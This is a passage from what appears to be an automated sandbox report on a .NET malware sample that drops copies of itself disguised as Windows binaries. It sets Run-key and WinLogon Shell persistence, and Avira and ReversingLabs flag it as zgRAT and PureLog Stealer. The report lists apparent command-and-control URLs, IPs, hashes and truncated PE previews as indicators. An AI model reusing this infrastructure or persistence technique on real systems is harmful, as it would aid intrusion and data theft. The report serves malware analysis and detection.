                                                                15:21:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:21:33AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:21:43AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:21:53AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
                                                                15:22:02AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Recovery\SgrmBroker.exe"
                                                                15:22:11AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:22:28AutostartRun: WinLogon Shell "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:22:37AutostartRun: WinLogon Shell "C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe"

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                37.44.238.250loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                                                PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 505905cm.n9shka.top/imagePollLinuxCentral.php
                                                                r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 321723cm.renyash.ru/AuthdbBasetraffic.php
                                                                cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • whware.top/RequestLowGeoLongpollWordpress.php
                                                                vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                                8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 703648cm.renyash.top/provider_cpugame.php
                                                                4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                                Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                                4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 143840cm.nyashteam.ru/DefaultPublic.php
                                                                s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                fsin.topUuIspZT5b6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 172.67.203.2

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                HARMONYHOSTING-ASFRloader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 37.44.238.250
                                                                PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 37.44.238.250
                                                                r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 37.44.238.250
                                                                cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 37.44.238.250
                                                                vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 37.44.238.250
                                                                dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 37.44.238.94
                                                                dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 37.44.238.94
                                                                dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 37.44.238.94
                                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                                • 37.44.238.94
                                                                8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 37.44.238.250

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\Desktop\EAqnjiFq.logUdzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    7aHY4r6vXR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                              Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Program Files\Adobe\55b276f4edf653

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (843), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):843
                                                                                    Entropy (8bit):5.911814602705079
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3iTc0b9gGbXhWTik7oonqMI0c6K4zVWtq3z06YG:3RGbsiiqAtKu3z0G
                                                                                    MD5:3E17C4172595A81892C25ABCAF75413C
                                                                                    SHA1:48C4D675D213DBBC238D0DC476B63F4F389BDD66
                                                                                    SHA-256:49D4664F9925E04728FA537F0B447E266D341E73806086B285F331B3C801ACFA
                                                                                    SHA-512:95169C4676C9CAF4A25959B00D0FD74D83412A95FAEFC5C838B238F48C9C0A4C4D6AEE015E14E5E17EB489E1803466E47CEDDFF20CC3141D29DC6DEFD9AAADDE
                                                                                    Malicious:false
                                                                                    Preview:vLbvqYgZuEItTn5NAv9X2urdtPjR9BuhikyFVwPLXXGp9hoKhCNQFp7Be7CazPZsTkKsy01Ogy9enCeLlZt7xeb2nxlYtyWI8XWYW6VrL9tQpcXbd1zZfc5yJSEBOderc1gQqGypDCvyvKMKZJ4296ngchPE1TcseByy6HvXCJWdqGC8F3mFilsgOAyI0txtjDTtWYOSXh0zjJzVeR97rXJ3TRj6TngTVm4nxTlqpTrAv26ELcnju0BL4aaEyS9uBgd6PLiLpSSYpIHaUfu0A7jflstW2h2WT79PYAz94b4bhngvT9tThJuE78VhcLSIZ6ErI2CUpv5iCH87L7D3xiyKN5RaoSgtIwCljyma7YnvNLB0AYVeIZU0H3eNklqXPMZQFWYXUm5Y5C7B4baQ6BktbLdpUZ0VsPgAwuunA8Kfe55F5cSJLabNmqz33sC5wjqpf7PKqwP71FOfPYt1HrKRyTYF40tR5Pt4OQj8NIcYKdWgbTof8LxFZZ0MjJPzD8CmVUR8zvo9OvGV71olMOTuboezaWZD2mVMbtKGCppMgy0nSfPrennyoRLrzbicWkGma44NqhjgiGNmx1h4GrjO9ghJidRlHM06rONXkCB7EHQiDi483nWoB1n3XuoNQ7YVPR4jnKTEqlJ1Q8GAiSrd0M50lTA0XyqGs4TwnUVtTR8ZrvnYooo8Q5fDWE8UJdq25CJWpTWN78JiNfIzpmLsJs0wZPZiWBj0kGeolRsUSaARv6z06IohR7sMMW7a3x16YT7HBdNY31atsjAcZjmNWCimXScOUSaejE2c8rzd4Pnah9enVeAULnjWuVusA8Dla6Knqie

                                                                                    C:\Program Files\Adobe\StartMenuExperienceHost.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                                    C:\Program Files\Adobe\StartMenuExperienceHost.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Recovery\05a9f81f8aa671

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (648), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):648
                                                                                    Entropy (8bit):5.8823572302145
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:/zo6Nie8lTX4rq2HtM3pPewgphDPS+Bgfawn98Um3hPLXrS+j4GTt7A6Nno2xhV3:/zluLmhM3pPIpdGD+Umh7XTJrloezC2l
                                                                                    MD5:5679B60603076DB66C8161CF4A52070B
                                                                                    SHA1:FBC8EE30991A639E72048A1EAC80BC1FFB53F6E8
                                                                                    SHA-256:3614F92D15DE57530F31A65E45123400E720D3D8D79AF486E7924144AC9930E1
                                                                                    SHA-512:AE6488796935CA0B4BB061FA1C3ED8F255E7126A72EC495325780C09C9CDD3EAEC6A4CFB89CD9C3538B434FED0F87F0D917688B7D3EB00662D6B0DEC65A65A0F
                                                                                    Malicious:false
                                                                                    Preview:aB2atga8MmKu17Na4J1fTPjkYRLaodTgGFtysymoQRA33fC7V4HXTrUKcRCbV9UtToowOZsGhMOCOqq2ONFtV5NYuiWavKTQ7RjP1Qs6MBzGdR6vkKMH4kXXbPBpCRUX27E6GbA8eIgUGG4dmkzl7LWW3MxmOD45qcOgM9pJJNmwDDRVUiDcbtZrlsC4oYubOlno2YQm5qbujjS05cRpAbd7Cg5e6ufvdLicamd6SahvRpIBZM9MGEbwHplVdvpKLqQYA0aS8VXj4sqXY3FuvToYtwVuAIdhvXkkYuAjvqNvr21Y9O6jp5Y2C2oOepR02zyhIF8o2g8EF2r147vwL3108shgFwFFZW31DUP3PRqJ6UwKKwUh4fo888iaicjGb3ps8zxjr2g4Ms3o5XVSbhL4s42FvzVxsjsDoDLU8vzC8uwQE4eKGQp3ruAE6sx1gtMm9091LATqsI58ImB1UKqb4zV4DHYQ77fPhJQN4m8F69KjyC5Uq5hWCusKfFyEmDsunqa9Vy6rLlf5owFBLDkBaJMxaFszy4d3Qa5Il6829zKbOxgtAx3icrUdenjPGH3RHmoN07ZPFrCk8vimj9zBB4ajGcn8Xsw263TmIS2DXndvotfsE6qGR1QNMFHYTa2W5KoE

                                                                                    C:\Recovery\91e168f4ec1147

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (777), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):777
                                                                                    Entropy (8bit):5.900587876646576
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:ELHHH+lfgWbveqVD2Q2oSZ2whlqDrz9avUrtAam9ZYfr5th97MMBobECm7wR:aHn+dbxZGZx5XQD5XlMMBobmER
                                                                                    MD5:99D175C0AB03F540A82F7A1714AD0FE3
                                                                                    SHA1:FEF145B0C96EEC84FADFCCDDB05AB050A924B5FE
                                                                                    SHA-256:45D35EB0EF641497984908BCE84873EEA36DB4335DAD63A774CFAC2763444458
                                                                                    SHA-512:359DBEDADC0B91F00AECB696CB32047E8EC57DE40C8C4E432E93B96C6CAFECB143EFCDCA0B260129078AA36645E56EBC650C4F64A84FDA95D7BB22AB4F24BD03
                                                                                    Malicious:false
                                                                                    Preview:nXbo4X754aCpkEnGaCLeu6vG0eEaRIbaAfO3vhLubXgbUPjkbVgbFlBrlUyZSgnv9loE0uU21aDWZUvk4e86l9UYdgRbtvc4uubskftrAnkoipRQiNfyirJ9RQkTc3JF8Jmo3DAZuR58Zq0yPB2fQnWCkcbU4aOHeeqZDmXfNGDQwLjlawDaAnzUwkEalqeUCyd59aumoXSKkFPZ204IWyG0oVmdi63gltO8rol9BawnVpurUphvwV7OrnQoyRErdvi01RrOP4H5Bcf8l5I3YIuQv9QEX7KtWFKjH3zD7Tg1OCNOIRC3ILSVASF1Am0RuXj5S51sFF5Fl3BtwB6F4RkKxyiyx8CVcOH0dR6MZUyDQNtHQWF9qvXcxYIdWD4GDkmXwLPeFtpjdh4kFbib3Dpr0oDFJc0War9pkWVEGk36Fy9PdiY5ecNA45gHIKVm3SIvhO9tFdVSJslCpxllE428e9vpzN65PQCxpNrOiozBG41LTdcUjti9aKRidU32gaD2qyXbGXDZE12jIjVVvmVfsDWf5IuNv7ep08ffGAOLqJ4jSsa49iG4EiKnb2g7mzoHWMtJDzOuYJyiJxMNszOM0jkRx2DOeQj1ewMF9Q1JTWg4uleopSOwlbQwlbVLwAPHk6DWkGOb8E3eDqhMYYjMCwQDgZeh4qXTGYUxhHEiExyghws53JwXaDFxqAzKmqgSrkXpVuoQTBIO8tftrjov392DTgGhS45XRfz7ZDjJfgDZ50z6eFdDCvZrrTVznG8ZFu7d4

                                                                                    C:\Recovery\9e60a5f7a3bd80

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (700), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):700
                                                                                    Entropy (8bit):5.889564374008749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:rIJUHIXabNUnEeOqCDk3x7n6ut6bRRsIxMlLcBPLzGtxFSP55SYE2wpk41kaX5fk:rIJUHPeOqCDkB7ltMsIWszTPLTwK41kz
                                                                                    MD5:FAF16E369B73BE6F8517797A03B4B0E8
                                                                                    SHA1:67C4F16D601C8E38AAA2C5EC9796E49C409A65A4
                                                                                    SHA-256:63ACB774AE27BEB1741DE3EF8FCB541286D4E8248B277FDB3F8A7C437492B4CE
                                                                                    SHA-512:6E70E6D7A97E4BE7219BAC09299709312CF307B30769049C5119D49064F14056D15124EC62542659BD21FFF37CC72A16AC1E1197037D009E8356EACD9E2F5A4F
                                                                                    Malicious:false
                                                                                    Preview:JDMa2VfFHPFrufZhoUK3VC5vzDhgCvOL3IdCv8MZbXwSO5P9zzRJ8iVHHblyy9DVB4ymBWwpHuc8Qmg3yhqNeEMUwW5UXXlbTaRUHm8dClBNGW1f5rAQT016rdzobbRtIAozVLwLiNK2D8OZfZZqXUIdiUmoxTBlTRFGsBJt4ysFp83tPZJBBlWx1LQBjIYOMiiv3IrdQqvimDxka3YXJ9js4ROhuHJwad3HaIzHspuUzyLyXqlqtAFM800m3KtIh9HIJqKSDRpeOO2GGZJEgcDZYqIkRNNh6lx0qCorgSmcVk7t7ugdBomE5ruchkA0DHhmbCZDvciNzlExtYmhrtgS9s49SLJ6SwYODUS4UcsiGYOUn6tJ7dJUkPnsHavjSl5DMzuYGrMOB7LlejVVcA8ynDnxrjx4rIQecLIyMVCPQ4TmEBOhEaHSmHaJL6qg4Rh2rqJSbhIG7thsuBtqVP0QB72Vu9mQogU9Xa5X25GhRAU3jsYKMALpbQ1tyxic52cbZiUUGWxaIT8Am8vCkcDnVohGjLjEXnmZi3dBXEE0NvgIR1GzCf1czyGuAOu4xtCfqjbtfupgXNakIZysEtC1vJktxtAITJDdsBbsZXUR0VFlXgmkZC0DqLth9s6vtgNOJ61G7GTrZuBaE8VQHZtQS9xgR3sqajiUH0bbofnStJo6KTdBWpnUx66K

                                                                                    C:\Recovery\SgrmBroker.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                                    C:\Recovery\SgrmBroker.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Recovery\SystemSettings.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                                    C:\Recovery\SystemSettings.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                                    C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SgrmBroker.exe.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\SgrmBroker.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):847
                                                                                    Entropy (8bit):5.354334472896228
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                    Malicious:false
